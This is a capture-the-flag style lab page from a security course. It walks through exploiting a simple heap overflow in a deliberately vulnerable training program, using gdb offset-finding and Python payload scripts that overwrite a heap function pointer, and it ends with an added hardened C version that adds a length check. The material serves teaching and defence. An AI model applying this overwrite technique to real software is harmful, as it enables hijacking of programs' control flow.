ED 205: Very Simple Heap Overflow (10 pts)

What You Need

A 32-bit x86 Kali Linux machine, real or virtual. The project was written on Kali 2.

Purpose

To practice exploiting a very simple heap overflow vulnerability. This one is easy to exploit because there's a pointer in the heap that is used for a function call. That makes a heap overflow as simple as a stack overflow targeting EIP.

Creating a Vulnerable Program

This program just echoes back text from its command-line argument.

In Kali, in a Terminal window, execute these commands:

curl https://samsclass.info/127/proj/heap0.c > heap0.c
gcc heap0.c -w -g -no-pie -z execstack -o heap0
./heap0 HELLO
./heap0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

As shown below, running the program with "HELLO" works, showing a "level has not been passed" message, but running it with 90 'A' characters causes a "Segmentation fault".

Examining the Source Code

In Kali, in a Terminal window, execute these commands:

nano heap0.c

As shown below, two objects (C "data structures") are defined. Both will be stored in a region of memory called the "heap".

The first object is name[64], which has enough space for 64 characters.

Then comes fp, which holds a 4-byte pointer--that is, a RAM address.

Finally, there's a function named winner(). As you might expect, our goal is to execute that function.

Scroll down to see the rest of heap0.c, as shown below.

Close the file with Ctrl+X.

Observing the Heap

Execute these commands to run the program in the gdb debugger, place a breakpoint, run it with a short input string, and examine the process map:

gdb ./heap0
list 25,40
b 38
run AAAA
info proc map

Find the heap. When I did it, the heap was the fourth item on the list, starting at 0x804b000, as shown below.

Execute this instruction to see the contents of the heap, replacing the address with the correct address of the heap on your system.

x/120x 0x804b000

Find "0x41414141" on the heap, as shown below. You may have to press Enter to see more pages of memory to find it on your system.

As highlighted below, two values are stored on the heap: "0x41414141" is 'AAAA', and a short distance after that there's an address, which was 0x080484c1 when I did it.

Execute this instruction to disassemble the function "nowinner".

disassemble nowinner

As shown below, this function starts at the address stored on the heap: 0x080484c1 on my system.

Execute these instructions to exit the debugger.

q
y

Observing a Crash

In Kali, in a Terminal window, execute this command:

nano h1

Enter this code, as shown below:

#!/usr/bin/python

print 'A' * 90

Save the file with Ctrl+X, Y, Enter.

Execute these commands to make the file executable, test it, and send it to heap0:

chmod a+x h1
./h1
./heap0 $(./h1)

90 characters are enough to crash the program.

Controlling the EIP

Execute these commands to make a modified attack file, to find out what characters ended up in $eip.

cp h1 h2
nano h2

Modify the file to send only 70 'A' characters followed by 20 bytes in a nonrepeating pattern, as shown below.

Save the file with Ctrl+X, Y, Enter.

Debugging the Program

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.

gdb -q ./heap0
run $(./h2)
info registers
q
y

As shown below, the program crashes with $eip = 0x36303530, or the ASCII text '0506'.

On my system, the characters before the EIP were 70 "A"s + '0001020304' for a total of 80 characters.

Targeting the EIP

Execute these commands to make a modified attack program that attempts to put 'BCDE' into the EIP.

cp h2 h3
nano h3

Modify the file as shown below.

Save the file with Ctrl+X, Y, Enter.

Debugging the Program

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.

gdb -q ./heap0
run $(./h3)
info registers

As shown below, the program crashes with $eip = 0x45444342, or the ASCII text 'BCDE'.

Finding an Address to Inject

Execute these commands to disassemble the winner() function.

disassemble winner
q
y

As shown below, the function started at address 0x08048496 on my system. Your address may be different--use the address you see on your screen.

The Final Exploit File

Execute these commands to make another attack program that puts 0x08048496 into the EIP.

cp h3 h4
nano h4

Modify the file as shown below.

Save the file with Ctrl+X, Y, Enter.


ED 205.1 Heap Exploit (10 pts)

Testing the Exploit

Execute this command:

./heap0 $(./h4)

The flag appears, covered by a green box in the image below.
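Now that the exploit works, here is the fix a developer would make. This is an added example, not the project's heap0.c: it assumes the same two heap objects the page describes (name[64] followed by a function pointer fp, allocated in that order) and that heap0.c fills name with an unbounded string copy of its command-line argument. The length check below refuses any argument that doesn't fit in name[], so the 90 'A' characters can no longer reach fp, and fp is only called after an accepted copy.

```c
/* Added example, not the project's heap0.c: the same two heap objects the page
 * describes, with the assumed unbounded copy of argv[1] replaced by a length check. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct data { char name[64]; };    /* first heap object: the 64-byte name buffer */
struct fp   { void (*fp)(void); }; /* second heap object: 4 bytes on 32-bit x86 */

void winner(void)   { puts("level passed"); }
void nowinner(void) { puts("level has not been passed"); }

/* Hardened copy: refuses input that does not fit in name[] with its NUL, so
 * the copy can never spill past name[] into the chunk holding fp. */
int set_name(struct data *d, const char *src) {
    size_t len = strlen(src);
    if (len >= sizeof d->name)      /* 64 or more bytes: reject, don't truncate silently */
        return -1;
    memcpy(d->name, src, len + 1);  /* bounded copy including the terminator */
    return 0;
}

/* Same flow as heap0: allocate both objects, point fp at nowinner, copy the
 * argument, call through fp. Returns 1 if fp still points at nowinner. */
int run(const char *arg) {
    struct data *d = malloc(sizeof *d);
    struct fp   *f = malloc(sizeof *f);
    f->fp = nowinner;
    int accepted = (set_name(d, arg) == 0);
    int intact = (f->fp == nowinner);
    if (accepted)
        f->fp();                    /* only call through fp after an accepted copy */
    free(f); free(d);
    return intact;
}

/* Runs the program with n 'A' characters, like the h1 script's 'A' * 90. */
int run_with_as(size_t n) {
    char *buf = malloc(n + 1);
    memset(buf, 'A', n); buf[n] = '\0';
    int intact = run(buf);
    free(buf);
    return intact;
}

int main(void) {
    printf("HELLO:  fp intact = %d\n", run("HELLO"));    /* 1, nowinner() ran */
    printf("90 x A: fp intact = %d\n", run_with_as(90)); /* 1, input rejected */
    return 0;
}
```

Build it with the same gcc line as heap0 (without -w) and run it with the h1 output; the oversized argument is rejected instead of overwriting fp.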

Sources

https://www.vulnhub.com/series/exploit-exercises,11/#

https://csg.utdallas.edu/wp-content/uploads/2012/08/Heap-Based-Exploitation.pdf

https://www.mattandreko.com/2012/01/10/exploit-exercises-heap-0/


Posted 9-17-15 by Sam Bowne
Revised 9-28-15
Revised for Kali 2018.1 2-22-18
Tested on Kali 2018.3 x86 and it worked fine 9-22-18